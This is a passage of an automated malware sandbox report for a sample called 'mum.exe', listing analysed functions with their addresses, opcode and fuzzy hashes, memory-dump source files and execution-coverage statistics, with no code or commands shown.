Instruction Fuzzy Hash: 2FE09A70815229CFDB64DF11DC84B99B776BB44314F014596A509A7250DB715AA5CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002C3750 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e21a170ac48e6ebb854dc7f5caa1021ae5009f60a732084239685eaa1b98f5ac
Instruction ID: 40f4fe4d5c7bd49f2b11d56e796dc530177c819abeff6f2359a818943c727dab
Opcode Fuzzy Hash: e21a170ac48e6ebb854dc7f5caa1021ae5009f60a732084239685eaa1b98f5ac
Instruction Fuzzy Hash: 0BD017B0D1C249CBDB60CF65E8049AEBB70FF0A304F10965EC83263292C33805058F02

Uniqueness

Uniqueness Score: -1.00%

Function 002C3100 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633395367d57830cecba4809278dc9e7316f070dd58f7adc7917d1dc314f43f8
Instruction ID: 6461b37ccac3355883fb763f48c7c06eb53e75a9451a93f0310dad47475c4de4
Opcode Fuzzy Hash: 633395367d57830cecba4809278dc9e7316f070dd58f7adc7917d1dc314f43f8
Instruction Fuzzy Hash: 69C04C9540D7C41ED71242B0151E9835F94186334870B64DBCE40CD057D2180D05D632

Uniqueness

Uniqueness Score: -1.00%

Function 002C373D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661a607b1071dff02488c0659fa2e2584ae6942e92c77b17b098601ae2f2a8ae
Instruction ID: 4b75d0debd3b5384ba899789290d7f0699fad3a8e5a3f8286cb7a3ffe0420d68
Opcode Fuzzy Hash: 661a607b1071dff02488c0659fa2e2584ae6942e92c77b17b098601ae2f2a8ae
Instruction Fuzzy Hash: A9D0CAB8D2820ACB9B00CFA2E9448AEBBB0FB05350B200A1E9002A3200CB701A208E85

Uniqueness

Uniqueness Score: -1.00%

Function 002C18B0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345c9b30d2366388bd6d0692f55141bc4bfe9941e473a2b906c68f914c647489
Instruction ID: ebd90f03699bab6927e75be2baa7007f19fe18a950b11ce54a8dc4df17c042f9
Opcode Fuzzy Hash: 345c9b30d2366388bd6d0692f55141bc4bfe9941e473a2b906c68f914c647489
Instruction Fuzzy Hash: 7FB0123031860A4A36905BB26D05B2277CC5A115043400634980CC0011F904D4204240

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mum.exePID: 828, Parent PID: 2708COMMON

Execution Graph

Execution Coverage:	20.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	231
Total number of Limit Nodes:	16

Executed Functions

Function 00252620 Relevance: 1.8, APIs: 1, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002526FC

Memory Dump Source

Source File: 00000022.00000002.1276328413.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_250000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a8fb7027148f414810e83a54f1c909de796fdeb742f69a151d08d50a0c0f0ba8
Instruction ID: 97a068e320e3649f0a9fdd2859a29235905eb0f933569d08b22df03a8c618e0a
Opcode Fuzzy Hash: a8fb7027148f414810e83a54f1c909de796fdeb742f69a151d08d50a0c0f0ba8
Instruction Fuzzy Hash: 31D1E274E00218CFDB14DFA5C994B9DBBB2BF89305F2481AAD809AB365DB345E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F5258 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F5323

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a5528f61de165239ab1a8506155bf8511a012e29d2e50d285c86a9d85befa160
Instruction ID: 02f695aea942763ad0749b4150e9cd654061e8d4575d79357ac50b80b73e1207
Opcode Fuzzy Hash: a5528f61de165239ab1a8506155bf8511a012e29d2e50d285c86a9d85befa160
Instruction Fuzzy Hash: 29C1D374E00218CFDB14DFA5C994BADBBB2BF89305F2081AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F1A58 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F1B23

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bb70c0876fb0042681ad6031c1243ddc95d3b76addeaea14aec6a159394c57ac
Instruction ID: f46dd050cd0694f54e6f633c8797dfaf8c83d0138ae633c43db60bb02bf76c91
Opcode Fuzzy Hash: bb70c0876fb0042681ad6031c1243ddc95d3b76addeaea14aec6a159394c57ac
Instruction Fuzzy Hash: 6AC1D474E00218CFDB14DFA5C994BADBBB2BF89305F2081AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F0D50 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F0E1B

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5d9aad2ba77c2d3a6947154986e9650beda1c7084446952f324c31deec87d60b
Instruction ID: 92a7b2870ae0bcdc8ad7409a4c2bc63c66678a723108f6d8edaf2d1c120ad533
Opcode Fuzzy Hash: 5d9aad2ba77c2d3a6947154986e9650beda1c7084446952f324c31deec87d60b
Instruction Fuzzy Hash: CDC1E574E00218CFDB14DFA5C994BADBBB2BF89304F2091AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F0048 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F0113

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2e952601500bd7dcdcf773934b60c9e2908abdd25ed0d2e4c6216c09fd32b6a6
Instruction ID: 94c48e3438d58ac324c2458b2adee7ce72690bebb4dcf70fd462208649c766dd
Opcode Fuzzy Hash: 2e952601500bd7dcdcf773934b60c9e2908abdd25ed0d2e4c6216c09fd32b6a6
Instruction Fuzzy Hash: 90C1E474E00218CFDB14DFA5C994BADBBB2BF89304F2490AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F8F78 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F9043

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9be6771104b620116776ca981bb58c3f9d06901cef98ad730d55443f97d9610b
Instruction ID: 225b6231530893cec1bee6d5b49aab3adaf9d8d4cf1aefe979d84bde04eeb7c9
Opcode Fuzzy Hash: 9be6771104b620116776ca981bb58c3f9d06901cef98ad730d55443f97d9610b
Instruction Fuzzy Hash: 5DC1D374E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F8270 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F833B

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: da2dfb18f61a4e5b36a656f345f8ae790d344b5192bfa0526d07b832f25b3784
Instruction ID: cbafa99d7b2a5131d780972186244de25dba555544b0b78e23a30b66ee670f8e
Opcode Fuzzy Hash: da2dfb18f61a4e5b36a656f345f8ae790d344b5192bfa0526d07b832f25b3784
Instruction Fuzzy Hash: 0EC1D474E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F7568 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F7633

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1294e3e70162906bfd897308c5f15bd8b3367001382aec4ea99cebde2b5485bf
Instruction ID: 581023411c85e1b0d4e2008f7c1d3cc4137bd5c9c4ac24223c26c833c417c3ac
Opcode Fuzzy Hash: 1294e3e70162906bfd897308c5f15bd8b3367001382aec4ea99cebde2b5485bf
Instruction Fuzzy Hash: F1C1C274E04218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F7E18 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F7EE3

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b42f85588cdafc88059a5968fed8399a2d1fb919ac052b37ddfde69c89f3e669
Instruction ID: 43088340b3cf2a0ae6a9b75538e4c0aa4e233ffd634cd8646a6ee1fba89bfd51
Opcode Fuzzy Hash: b42f85588cdafc88059a5968fed8399a2d1fb919ac052b37ddfde69c89f3e669
Instruction Fuzzy Hash: 00C1D374E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F7110 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F71DC

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: efa0c718b29076d6e5bc92aa99af3af85f08c396bc116015712c84e493680473
Instruction ID: 0e48c992024b293efa394410f5016b7360bcda008a97ab928e4fc8f3127ea406
Opcode Fuzzy Hash: efa0c718b29076d6e5bc92aa99af3af85f08c396bc116015712c84e493680473
Instruction Fuzzy Hash: 8DC1E474E00218CFDB14DFA5C994BADBBB2BF89305F2080AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F1600 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F16CB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 87db0535a012d8709424e232a0d0734004b326036ab2c151caf599210ac943ec
Instruction ID: d493186e4e8bb67ed3ed366bc8ccab444083aeb2eed585d8aa2fa8ea24ef4dd6
Opcode Fuzzy Hash: 87db0535a012d8709424e232a0d0734004b326036ab2c151caf599210ac943ec
Instruction Fuzzy Hash: F9C1E474E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F6838 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F6903

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1d0266712f054288813f73e235c88d6948cbebec46ccbabf206c19e861d26877
Instruction ID: 8341bed49afdee0d3d28d1bceb9c7d4f81f5c2ff0b8020a1ca074fff9acdc77a
Opcode Fuzzy Hash: 1d0266712f054288813f73e235c88d6948cbebec46ccbabf206c19e861d26877
Instruction Fuzzy Hash: 8BC1C274E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F5B30 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F5BFB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4f08c1504b54fad0d061e860556dbe8f64185dc20d7bd209a8e881900d3f2580
Instruction ID: 486214cebf75180e4a9a14286212a9f6a610b64d44e6a08edf8795b479a053f4
Opcode Fuzzy Hash: 4f08c1504b54fad0d061e860556dbe8f64185dc20d7bd209a8e881900d3f2580
Instruction Fuzzy Hash: 90C1D374E00218CFDB14DFA5C994BADBBB2BF89304F2080AAD909AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F8B20 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F8BEB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b5f847b0c3da9471715ba50b54c0f2519e646af06dac338473fbc5464183b017
Instruction ID: 7ff1fed78309f5672f1a170d9bcf674581f92694c10ac167233c2cfa4325823f
Opcode Fuzzy Hash: b5f847b0c3da9471715ba50b54c0f2519e646af06dac338473fbc5464183b017
Instruction Fuzzy Hash: 09C1D374E00218CFDB14DFA5C994BADBBB2BF89305F2081AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F56D8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F57A3

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6a2cb46dc75e624609cf6a52824ba11b798e482cf960f26e8263221924baa64d
Instruction ID: 70ab4eb7d1091fc0a743d585be7faa5e89ee129549f5342b8549cf8a0f104e63
Opcode Fuzzy Hash: 6a2cb46dc75e624609cf6a52824ba11b798e482cf960f26e8263221924baa64d
Instruction Fuzzy Hash: 58C1F374E00218CFDB14DFA5C994BADBBB2BF89305F2081A9D909AB355DB349E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F86C8 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F8793

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6bdbab22da52205aa182d92c44a10cb536ca777e1e333743b5041e3f1d571081
Instruction ID: 237ffe529c07e894d90bd26a21321cfcddae5373c03b20b2919c9657d0202518
Opcode Fuzzy Hash: 6bdbab22da52205aa182d92c44a10cb536ca777e1e333743b5041e3f1d571081
Instruction Fuzzy Hash: 9FC1C274E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F79C0 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F7A8B

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f7bc2b1a71e5c6fcb21b1a03521a83bf61023d4e4c4279192fb4086a4f092af7
Instruction ID: 9f625f951dfb7381799a912ebbf2ad69ef10fca71f270de9830e891e6ba8421d
Opcode Fuzzy Hash: f7bc2b1a71e5c6fcb21b1a03521a83bf61023d4e4c4279192fb4086a4f092af7
Instruction Fuzzy Hash: B8C1E474E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F08F8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F09C3

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0f41a4dde26d829a436c06858c738eaf28d2b31bedb8bfe2b89fc4504a7d1883
Instruction ID: c0e06113717cd59f5b131c723e841ead687df564c4f5487c17a1b9b197e78426
Opcode Fuzzy Hash: 0f41a4dde26d829a436c06858c738eaf28d2b31bedb8bfe2b89fc4504a7d1883
Instruction Fuzzy Hash: 54C1F374E00218CFDB14DFA5C994BADBBB2BF89304F2491AAD909AB355DB345E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F63E0 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F64AB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 99aeaa9c375e39f6e5ec919bb4df428243b44bb4ad5e339d7ad5d107c7a85151
Instruction ID: 4417739ab6714df5a094a757fc232bcefe2a1f0be49943eff1deffbd5f8cadeb
Opcode Fuzzy Hash: 99aeaa9c375e39f6e5ec919bb4df428243b44bb4ad5e339d7ad5d107c7a85151
Instruction Fuzzy Hash: 5DC1D374E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F6C90 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F6D5B

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e8943d2cbc9f3e5c747d1034d523d7b49ac03e8129eec5497a8200d8a529feb4
Instruction ID: 12fa36d333b6d5753ca09f231e6c3131c45a886a413a9731342e7ae7d54cfd4f
Opcode Fuzzy Hash: e8943d2cbc9f3e5c747d1034d523d7b49ac03e8129eec5497a8200d8a529feb4
Instruction Fuzzy Hash: E9C1D474E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 005F0006 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F0113

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c87e94ab8b17f0f5149b5035fe1b7192c53420790e542f4024d38b70cfd342aa
Instruction ID: f7ddc3347235fdb605b479d17e6050681ffc23db7e0d604b6f6111fd6b8389f6
Opcode Fuzzy Hash: c87e94ab8b17f0f5149b5035fe1b7192c53420790e542f4024d38b70cfd342aa
Instruction Fuzzy Hash: BE416F70D09388CFDB05CFBAC8546ADBFB2AF8A304F24C06AC454AB2A6D7340949CF51

Uniqueness

Uniqueness Score: -1.00%

Function 005F5B20 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F5BFB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 000f62a34208457902ad0846ffde42106a30197ac0081a07f070505d0860f02c
Instruction ID: b61893c9cc5043ab30d1aedcab53e27767d8134bd483ed43ba947d021f3779fb
Opcode Fuzzy Hash: 000f62a34208457902ad0846ffde42106a30197ac0081a07f070505d0860f02c
Instruction Fuzzy Hash: AD41F670E00608CFEB18DFAAD4416EEBBF2AF89304F64D12AD514AB359EB345946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F6828 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F6903

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e5648e25cfe21469d07f8b89a9a57f39b973fbfd703b52ee3984423a07587be4
Instruction ID: 6ed7d615cc8e8e7c8c037f444952adb5a869b313393b8b9cc04ce3e75b904e35
Opcode Fuzzy Hash: e5648e25cfe21469d07f8b89a9a57f39b973fbfd703b52ee3984423a07587be4
Instruction Fuzzy Hash: A641D470E00208CBDB18DFAAD9516EEBBF2AF89304F24D129D514BB259DB345946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F5F78 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F6053

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dbf6d52751eaafa1b51ca4c81e7a3a09e9b27bc4c1b12832d178f9d06bfc071f
Instruction ID: 0ba69bff12a5deec931912eed993f26d6564b14c9f6806630a341e7d610435cb
Opcode Fuzzy Hash: dbf6d52751eaafa1b51ca4c81e7a3a09e9b27bc4c1b12832d178f9d06bfc071f
Instruction Fuzzy Hash: FC41F574E01208CFEB18DFAAC5446EEBBF2AF89304F24D12AD514AB399DB345945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F63D1 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F64AB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e0f9176745e13e689c294cb0e25a88d3718c492b4e9764dd8b98eaf6b6778ee6
Instruction ID: 48495f55b99850c4bfa06c3e80cd923e422becfa38fcea6bb8b5528a8f4b133b
Opcode Fuzzy Hash: e0f9176745e13e689c294cb0e25a88d3718c492b4e9764dd8b98eaf6b6778ee6
Instruction Fuzzy Hash: 6A41E270E01208CBEB18DFAAC5446EEBBF2BF89304F24D12AD514AB369DB345949CF44

Uniqueness

Uniqueness Score: -1.00%

Function 005F8260 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F833B

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dd4fd81e0117911be33c70783dfcb8ac2dce3e8520e894b24dbdfc18f86bfd48
Instruction ID: c7b2c55875e6c99f263499f135a010239094f730067aa903ee5b574e576d9dd5
Opcode Fuzzy Hash: dd4fd81e0117911be33c70783dfcb8ac2dce3e8520e894b24dbdfc18f86bfd48
Instruction Fuzzy Hash: 4441D470E01208CBDB18DFAAC9546EEBBF2BF89304F24D129D514AB265EB345946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F08E8 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F09C3

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 67dd215df930a5117efbed208fc394bbbf28ee43b1f162857d97efd2f56354a9
Instruction ID: c83acdcc93b1d75f095734b2ab37c3dc96863839b0a3820d6500ed3cd88ddd10
Opcode Fuzzy Hash: 67dd215df930a5117efbed208fc394bbbf28ee43b1f162857d97efd2f56354a9
Instruction Fuzzy Hash: D941E470E05248CBDB18DFAAC9546AEFBB2AF89300F24D12AD514BB3A9DB345945CF50

Uniqueness

